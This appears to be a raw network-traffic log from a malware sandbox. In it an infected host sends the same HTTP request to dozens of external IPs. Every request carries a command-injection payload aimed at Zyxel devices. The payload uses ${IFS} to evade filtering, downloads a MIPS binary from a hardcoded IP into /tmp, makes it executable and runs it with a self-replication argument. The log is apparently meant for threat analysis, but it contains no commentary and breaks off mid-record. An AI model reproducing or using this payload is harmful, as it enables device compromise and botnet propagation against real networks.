                                                        Feb 2, 2024 06:21:04.830935001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3098192.168.2.1444612131.157.202.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.830986977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3099192.168.2.1440062207.96.190.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831027985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3100192.168.2.144029498.162.89.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831058979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3101192.168.2.1437572171.41.1.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831125021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3102192.168.2.14496062.96.142.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831146002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3103192.168.2.145921644.70.180.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831186056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3104192.168.2.143886013.102.39.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831207991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3105192.168.2.144407267.185.127.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831285000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3106192.168.2.1442782173.80.162.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831291914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3107192.168.2.1435904143.171.247.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831336975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3108192.168.2.145889087.140.103.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831361055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3109192.168.2.1450466186.220.240.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831401110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3110192.168.2.144884619.58.112.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831438065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3111192.168.2.145132092.231.126.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831505060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3112192.168.2.1444218207.209.178.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831526041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3113192.168.2.1448252142.156.145.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831556082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3114192.168.2.1433298150.115.166.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831624031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3115192.168.2.1434160202.55.42.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831654072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3116192.168.2.146049212.29.33.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831686974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3117192.168.2.1441588158.215.121.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831729889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3118192.168.2.1455810171.47.90.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831762075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3119192.168.2.1445418126.107.211.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831784010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3120192.168.2.1456164175.148.32.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831845045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3121192.168.2.1451876107.84.91.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831886053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3122192.168.2.1459466135.195.96.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831921101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3123192.168.2.1449758167.75.120.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.831963062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3124192.168.2.1457094175.160.244.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832012892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3125192.168.2.144681670.100.195.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832036972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3126192.168.2.146064034.36.32.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832067013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3127192.168.2.144767220.43.124.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832112074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3128192.168.2.1445156162.63.169.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832158089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3129192.168.2.1457428144.220.210.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832205057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3130192.168.2.145110489.220.13.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832233906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3131192.168.2.14584502.123.100.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832278013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3132192.168.2.144906243.250.41.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832318068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3133192.168.2.1459706117.228.17.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832356930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3134192.168.2.144945071.44.71.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832386971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3135192.168.2.1457124161.113.73.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832426071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3136192.168.2.145604483.205.150.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832461119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3137192.168.2.1459362217.81.139.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832500935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3138192.168.2.144203247.101.76.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832566977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3139192.168.2.1457170203.39.124.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832592010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3140192.168.2.144097063.117.117.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832633018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3141192.168.2.1450934146.177.15.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832665920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3142192.168.2.1439518150.95.112.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832695961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3143192.168.2.1440528145.216.254.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832727909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3144192.168.2.14332288.216.62.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832783937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3145192.168.2.1438462182.207.94.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832811117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3146192.168.2.144051898.15.138.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832858086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3147192.168.2.1440622139.100.59.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832911968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3148192.168.2.144383247.19.62.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832933903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3149192.168.2.144468043.147.251.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.832983971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3150192.168.2.1458232138.82.156.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833019972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3151192.168.2.1459322105.90.99.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833062887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3152192.168.2.1458752108.159.58.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833111048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3153192.168.2.1434400160.224.4.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833147049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3154192.168.2.1456996112.53.193.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833182096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3155192.168.2.144345469.80.235.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833235025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3156192.168.2.145133020.189.151.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833271027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3157192.168.2.1458336170.177.245.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833302021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3158192.168.2.1446660221.217.183.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833334923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3159192.168.2.1455102130.227.80.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.833379984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3160192.168.2.144061824.251.63.140443
                                                        TimestampBytes transferredDirectionData
